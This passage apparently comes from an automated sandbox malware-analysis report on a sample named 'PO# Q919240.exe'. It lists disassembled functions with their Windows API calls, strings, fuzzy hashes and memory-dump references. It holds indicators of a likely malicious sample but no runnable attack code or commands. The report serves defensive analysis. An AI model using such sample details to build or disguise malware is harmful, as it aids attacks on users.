                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                • String ID:
                • API String ID: 3771399671-0
                • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 00434643
                • GetForegroundWindow.USER32(00000000), ref: 00434655
                • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                • String ID:
                • API String ID: 2156557900-0
                • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                • API String ID: 0-1603158881
                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                Download Yara Rule
                APIs
                • CreateMenu.USER32 ref: 00448603
                • SetMenu.USER32(?,00000000), ref: 00448613
                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                • IsMenu.USER32(?), ref: 004486AB
                • CreatePopupMenu.USER32 ref: 004486B5
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                • DrawMenuBar.USER32 ref: 004486F5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                • String ID: 0
                • API String ID: 161812096-4108050209
                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\PO# Q919240.exe), ref: 00434057
                • LoadStringW.USER32(00000000), ref: 00434060
                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                • LoadStringW.USER32(00000000), ref: 00434078
                • _wprintf.LIBCMT ref: 004340A1
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                Strings
                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                • C:\Users\user\Desktop\PO# Q919240.exe, xrefs: 00434040
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: HandleLoadModuleString$Message_wprintf
                • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\PO# Q919240.exe
                • API String ID: 3648134473-3217746438
                • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO# Q919240.exe,0040F545,C:\Users\user\Desktop\PO# Q919240.exe,004A90E8,C:\Users\user\Desktop\PO# Q919240.exe,?,0040F545), ref: 0041013C
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                • MoveFileW.KERNEL32(?,?), ref: 00453932
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                • String ID:
                • API String ID: 978794511-0
                • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove$_memcmp
                • String ID: '$\$h
                • API String ID: 2205784470-1303700344
                • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                • VariantClear.OLEAUT32 ref: 0045EA6D
                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                • __swprintf.LIBCMT ref: 0045EC33
                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                Strings
                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                • String ID: %4d%02d%02d%02d%02d%02d
                • API String ID: 2441338619-1568723262
                • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                Download Yara Rule
                APIs
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Interlocked$DecrementIncrement$Sleep
                • String ID: @COM_EVENTOBJ
                • API String ID: 327565842-2228938565
                • Opcode ID: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                • Opcode Fuzzy Hash: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                Download Yara Rule
                APIs
                • VariantClear.OLEAUT32(?), ref: 0047031B
                • VariantClear.OLEAUT32(?), ref: 0047044F
                • VariantInit.OLEAUT32(?), ref: 004704A3
                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                • VariantClear.OLEAUT32(?), ref: 00470516
                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Variant$Clear$Copy$CallDispFuncInit
                • String ID: H
                • API String ID: 3613100350-2852464175
                • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                Download Yara Rule
                APIs
                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                • DestroyWindow.USER32(?), ref: 00426F50
                • UnregisterHotKey.USER32(?), ref: 00426F77
                • FreeLibrary.KERNEL32(?), ref: 0042701F
                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                • String ID: close all
                • API String ID: 4174999648-3243417748
                • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                Download Yara Rule
                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
